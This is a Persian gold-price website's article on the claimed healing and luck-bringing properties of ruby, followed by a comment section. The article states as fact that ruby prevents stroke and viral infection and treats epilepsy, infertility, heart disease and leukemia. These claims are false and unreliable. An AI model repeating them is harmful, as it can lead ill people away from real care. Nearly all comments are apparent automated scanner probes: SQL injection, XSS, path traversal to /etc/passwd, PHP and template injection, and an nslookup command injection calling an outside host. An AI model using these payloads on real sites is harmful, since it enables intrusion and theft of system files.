سامانه پیامکی طلا،سکه،ارز،تلفن گویا صفحه حرفه ای قیمت ها !!! اوقات شرعی وساعات نماز

ﺧﻮاص و ﻓﻮاﯾﺪ ﯾﺎ ﻗﻮت

ﺧﻮاص و ﻓﻮاﯾﺪ ﯾﺎ ﻗﻮت

آوﯾﺨﺘﻦ ﯾﺎﻗﻮت ﺑﺮ ﮔﺮدن ، ﻣﺎﻧﻊ ﻟﺨﺘﻪ ﺷﺪن ﺧﻮن در ﺑﺪن ﮔﺮدﯾﺪه و از ﺳﮑﺘﻪ ﺟﻠﻮﮔﯿﺮي ﻣﯽ ﮐﻨﺪ اﮔﺮ ﮐﺴﯽ ﯾﺎﻗﻮت ﺑﻪ ﻫﻤﺮاه داﺷﺘﻪ ﺑﺎﺷﺪ ﺑﻪ ﺑﯿﻤﺎري ﻫﺎي وﯾﺮوﺳﯽ ﺧﻄﺮﻧﺎك و واﮔﯿﺮ دار ﻣﺒﺘﻼ ﻧﻤﯽ ﺷﻮد. اﮔﺮ ﮐﺴﯽ داﺋﻤﺎ ﯾﺎﻗﻮت ﺑﻪ ﻫﻤﺮاه داﺷﺘﻪ ﺑﺎﺷﺪ در ﭼﺸﻢ ﻣﺮدم ﺑﺎ ﻫﯿﺒﺖ و ﺷﮑﻮه ﺟﻠﻮه ﮔﺮ ﻣﯽ ﺷﻮد و ﮐﺴﺐ و درآﻣﺪش روﻧﻖ ﻣﯽ ﮔﯿﺮد. این گوهر ﺷﺠﺎﻋﺖ را ﺗﻘﻮﯾﺖ کرده و همچنین ﻧﻤﺎد ﺷﺎﻧﺲ، وﻓﺎداري، ﺛﺮوت و ﺑﺮﮐﺖ اﺳﺖ. ﯾﺎﻗﻮت ﺳﺒﺐ اﯾﺠﺎد ﺧﻮﺷﺒﺨﺘﯽ، ﻋﺸﻖ ورزي و آراﻣﺶ در ﻓﺮد ﻣﯽ ﺷﻮد. این گوهر ضد اﺿﻄﺮاب و ﺑﯽ ﺧﻮاﺑﯽ است و ﺑﺎﻋﺚ ﺟﺬب ﻣﺤﺒﺖ و ﭘﯿﻮﻧﺪ زوﺟﯿﻦ می گردد، ﺑﺮاي دﺧﺘﺮان دم ﺑﺨﺖ ﻧﯿﺰ ﺧﻮﺷﺒﺨﺘﯽ ﻣﯽ آورد.

ﻏﻢ را از ﺷﻤﺎ دور می کند و ﺷﺎدي را به ارﻣﻐﺎن ﻣﯽ آورد. از اﯾﻦ رو ﯾﺎﻗﻮت را دﻟﯿﻠﯽ ﺑﺮاي ﺷﺎداﺑﯽ و آراﻣﺶ ﻣﯽ داﻧﻨﺪ. این گوهر ﺳﺒﺐ ﺟﺬب اﻧﺮژي ﻫﺎي ﻣﺜﺒﺖ و ﻋﺰﯾﺰ ﺷﺪن در ﺟﻤﻊ و ﺿﺪ ﻃﻠﺴﻢ ﻣﯽ ﺑﺎﺷﺪ.

یاقوت ﺳﻨﮕﯽ ﺑﺴﯿﺎر ﭘﺮاﻧﺮژي ﺑﻮده و ﻧﯿﺮوي ﭘﺎك ﺳﺎزي و ﺷﻔﺎﺑﺨﺸﯽ ﻓﻮق اﻟﻌﺎده اي دارد. ﺑﺮاي ﺗﻨﻈﯿﻢ ﮔﺮدش ﺧﻮن و دﺳﺘﮕﺎه ﮔﻮارش ﻣﻔﯿﺪ و اﻋﺼﺎب را ﺗﻘﻮﯾﺖ و آرام ﻣﯽ ﮐﻨﺪ. ﺑﺮاي ﺑﯿﻤﺎري ﻫﺎي ﺻﺮع، رﻋﺸﻪ، ﺳﺮدردﻫﺎي ﻋﺼﺒﯽ و ﻣﯿﮕﺮن ﻣﻔﯿﺪ اﺳﺖ. هچنین ﺑﺮاي درﻣﺎن اﻓﺴﺮدﮔﯽ، ﺳﺮﮔﯿﺠﻪ و ﺑﯽ ﺧﻮاﺑﯽ ﮐﺎرﺑﺮد ﻣﻮﺛﺮي دارد. یاقوت ﺑﺮاي ﺗﺴﮑﯿﻦ دردﻫﺎي روﻣﺎﺗﯿﺴﻤﯽ و ﻣﻔﺼﻠﯽ، دردﻫﺎي ﺟﺮاﺣﯽ و ﻧﻘﺮس ﻧﻘﺶ ﻣﻮﺛﺮي دارد. از این گوهر می توان ﺑﺮاي رﻓﻊ ﺟﻮش ﻫﺎي ﺻﻮرت و ﺣﺴﺎﺳﯿﺖ ﻫﺎي ﭘﻮﺳﺘﯽ و ﺷﻮره ﺳﺮ استفاده کرد و ﺑﺮاي درﻣﺎن ﺗﯿﺮوﺋﯿﺪ و ﺑﯿﻤﺎري ﻫﺎي ﻟﻮزاﻟﻤﻌﺪه و ﺗﻘﻮﯾﺖ ﺗﺎرﻫﺎي ﺻﻮﺗﯽ و درﻣﺎن ﻟﮑﻨﺖ زﺑﺎن ﻧﯿﺰ ﺑﻪ ﮐﺎر ﻣﯽ رود. ﻧﻘﺶ ﯾﺎﻗﻮت در ﺗﻘﻮﯾﺖ ﺣﺲ ﺑﯿﻨﺎﯾﯽ ، ﮐﻠﯿﻪ ﻫﺎ، ﭼﺸﻢ ﻫﺎ و ﺣﺲ ﺑﻮﯾﺎﯾﯽ ﻣﻮرد ﺗﻮﺟﻪ ﺑﺴﯿﺎري از ﻣﺮدم ﻗﺮار ﮔﺮﻓﺘﻪ اﺳﺖ.

ﺑﺮاي ﺑﯿﻤﺎري ﻫﺎي ﺧﻮﻧﯽ ﺗﻮﺻﯿﻪ ﺷﺪه، درد ﻗﺎﻋﺪﮔﯽ را ﮐﺎﻫﺶ داده و در زﻣﯿﻨﻪ ﻧﺎﺑﺎروري و ﻧﺎﺗﻮاﻧﯽ ﺟﻨﺴﯽ ﻣﻔﯿﺪ ﻣﯽ ﺑﺎﺷﺪ. ﯾﺎﻗﻮت ﻗﺮﻣﺰ ﺑﺮاي درﻣﺎن ﺑﯿﻤﺎران ﻗﻠﺒﯽ و ﻣﺒﺘﻼﯾﺎن ﺑﻪ ﺳﺮﻃﺎن ﺧﻮن ﺑﻪ ﮐﺎر رﻓﺘﻪ و ﻋﺎﻣﻞ ﺗﺼﻔﯿﻪ و ﺗﻨﻈﯿﻢ ﻓﺸﺎرﺧﻮن اﺳﺖ.

نظرات
ديدگاه هاي ارسال شده توسط شما، پس از تاييد توسط سايت طلا در وب سايت منتشر خواهد شد
0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 15:36
1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 15:36
-1 OR 3*2>(0+5+290-290)

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 15:36
-1 OR 3+290-290-1=0+0+0+1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 15:36
-1 OR 2+290-290-1=0+0+0+1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 15:36
-1 OR 3*2>(0+5+873-873) --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 15:36
-1 OR 3+873-873-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 15:36
-1 OR 2+873-873-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 15:36
os8EynMN

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 15:34
1????%2527%2522

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
1F7TTS[!+!]

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
10OmE3
Mrsq(9388)

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
1}body{acu:Expre/**/SSion(Mrsq(9144))}

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
[url=][/url]

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
?

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
1<ScRiPt>Mrsq(9742)</sCripT>

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
1u003CScRiPtMrsq(9429)u003C/sCripTu003E

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
%31%3C%53%63%52%69%50%74%20%3E%4D%72%73%71%289002%29%3C%2F%73%43%72%69%70%54%3E

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
1Mrsq(9673)

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
1

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
1Mrsq(9507)

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
1Mrsq(9351)

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
1Mrsq(9988)

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
1EEAY7[!+!]

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
1Mrsq(9841)

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
{{10000166*9999337}}

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:03
CWS000x?=?1N?
]s??0Q?L

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
acux2455??z1??z2a?bcxuca2455

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
acu9728<s1﹥s2ʺs3ʹuca9728

0 0

sggcqdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
19615036

0 0

vqvbhhoy 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
/www.vulnweb.com

0 0

sfusxsoi 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
1????%2527%2522

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
/.\./.\./.\./.\./.\./.\./windows/win.ini

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
................windowswin.ini

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
????????????????????????????????????????????????windows??win.ini

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
../../../../../../../../../../windows/win.ini.jpg

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
C:WINDOWSsystem32driversetchosts

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
../../../../../../../../../../windows/win.ini

0 0

cqpjnqcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02

0 0

uaatvhjf 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
${

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
WEB-INFweb.xml

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
/WEB-INF/web.xml

0 0

uaatvhjf 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
";print(md5(acunetix_wvs_security_test));$a="

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
WEB-INF/web.xml

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
/../../../../../../../etc/passwd

0 0

uaatvhjf 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
;print(md5(acunetix_wvs_security_test));

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

0 0

hkfdwbeo 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
testasp.vulnweb.com

0 0

hkfdwbeo 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02

0 0

hkfdwbeo 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02

0 0

hkfdwbeo 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
1some_inexistent_file_with_long_name.jpg

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
..??..??..??..??..??..??..??..??etc/passwd

0 0

hkfdwbeo 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
/.././.././.././.././.././.././.././../etc/./passwd%00

0 0

hpdsectp 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
${10000175+10000243}

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
%2fetc%2fpasswd

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
/etc/passwd

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
.\./.\./.\./.\./.\./.\./etc/passwd

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
/../..//../..//../..//../..//../..//etc/passwd.jpg

0 0

kdbefaqv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
to
bcc:013405.51-3261.51.38b02.1

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
../../../../../../../../../../etc/passwd.jpg

0 0

kdbefaqv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
1
bcc:013405.51-3258.51.38b02.1

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
../../../../../../../../../../../../../../../proc/version

0 0

nkihfbya 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
0

0 0

awpruemd 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
../../../../../../../../../../etc/passwd

0 0

nkihfbya 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:02
0

0 0

nkihfbya 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
0

0 0

nkihfbya 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
0

0 0

nkihfbya 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
0

0 0

qqfrxwoh 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
2Xo7QAoF

0 0

nkihfbya 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
0

0 0

nkihfbya 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
0

0 0

nkihfbya 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
0

0 0

oyqxqpvy 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
$(nslookup dns.ce.13405.51-3247.51.38b02.1.bxss.me)

0 0

nkihfbya 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
0

0 0

oyqxqpvy 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
set|set&set

0 0

nkihfbya 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
-1" OR 2+161-161-1=0+0+0+1 --

0 0

nkihfbya 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
-1 OR 2+22-22-1=0+0+0+1

0 0

nkihfbya 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
-1 OR 2+606-606-1=0+0+0+1 --

0 0

nkihfbya 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
lRydto5I

0 0

gpmmkmcu 51 سال میگه :

تاریخ: 1398/12/09 ساعت 14:01
1

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:46
19UTAF[!+!]

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:46
1o2iQU
jEqr(9635)

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:46
1}body{acu:Expre/**/SSion(jEqr(9768))}

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:45
[url=][/url]

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:45

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:45
?

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:45
1<ScRiPt>jEqr(9249)</sCripT>

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:45
1u003CScRiPtjEqr(9241)u003C/sCripTu003E

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:45
%31%3C%53%63%52%69%50%74%20%3E%6A%45%71%72%289387%29%3C%2F%73%43%72%69%70%54%3E

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:45
1jEqr(9458)

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:45
1

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:45
1jEqr(9441)

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:45
1jEqr(9404)

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:45
1jEqr(9415)

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:45
1HYOAQ[!+!]

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:45
1jEqr(9674)

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:45
{{10000133*10000343}}

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
CWS000x?=?1N?
]s??0Q?L

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
acux6037??z1??z2a?bcxuca6037

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
acu6184<s1﹥s2ʺs3ʹuca6184

0 0

vckcenoa 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
19367847

0 0

jdjrdjje 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
/www.vulnweb.com

0 0

uiwcbjhb 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1????%2527%2522

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
/.\./.\./.\./.\./.\./.\./windows/win.ini

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
................windowswin.ini

0 0

acodsarn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
${

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
????????????????????????????????????????????????windows??win.ini

0 0

acodsarn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
";print(md5(acunetix_wvs_security_test));$a="

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
../../../../../../../../../../windows/win.ini.jpg

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
C:WINDOWSsystem32driversetchosts

0 0

acodsarn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
;print(md5(acunetix_wvs_security_test));

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
../../../../../../../../../../windows/win.ini

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
WEB-INFweb.xml

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
/WEB-INF/web.xml

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
WEB-INF/web.xml

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
/../../../../../../../etc/passwd

0 0

wnqhrloj 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
testasp.vulnweb.com

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44

0 0

wnqhrloj 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

0 0

wnqhrloj 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
..??..??..??..??..??..??..??..??etc/passwd

0 0

wnqhrloj 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1some_inexistent_file_with_long_name.jpg

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

0 0

wnqhrloj 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
/.././.././.././.././.././.././.././../etc/./passwd%00

0 0

lltdlclc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
${9999633+10000442}

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
%2fetc%2fpasswd

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
/etc/passwd

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
.\./.\./.\./.\./.\./.\./etc/passwd

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
/../..//../..//../..//../..//../..//etc/passwd.jpg

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
../../../../../../../../../../etc/passwd.jpg

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

0 0

nnhyvjbo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
0

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
../../../../../../../../../../../../../../../proc/version

0 0

nnhyvjbo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
0

0 0

fafhsugr 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
to
bcc:013405.38-2833.38.5b3c2.1

0 0

ybngbhim 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
../../../../../../../../../../etc/passwd

0 0

fafhsugr 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1
bcc:013405.38-2830.38.5b3c2.1

0 0

nnhyvjbo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
0

0 0

nnhyvjbo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
0

0 0

nnhyvjbo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
0

0 0

nnhyvjbo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
0

0 0

nnhyvjbo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
0

0 0

nnhyvjbo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
0

0 0

nnhyvjbo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
0

0 0

lmumcmxb 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
OGMt74IH

0 0

nnhyvjbo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
-1" OR 2+635-635-1=0+0+0+1 --

0 0

kcvgiply 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
$(nslookup dns.ce.13405.38-2811.38.5b3c2.1.bxss.me)

0 0

nnhyvjbo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
-1 OR 2+379-379-1=0+0+0+1

0 0

kcvgiply 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
set|set&set

0 0

nnhyvjbo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
-1 OR 2+108-108-1=0+0+0+1 --

0 0

nnhyvjbo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
O8BjKpey

0 0

rwvwusac 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
1

اخبار سایر رسانه ها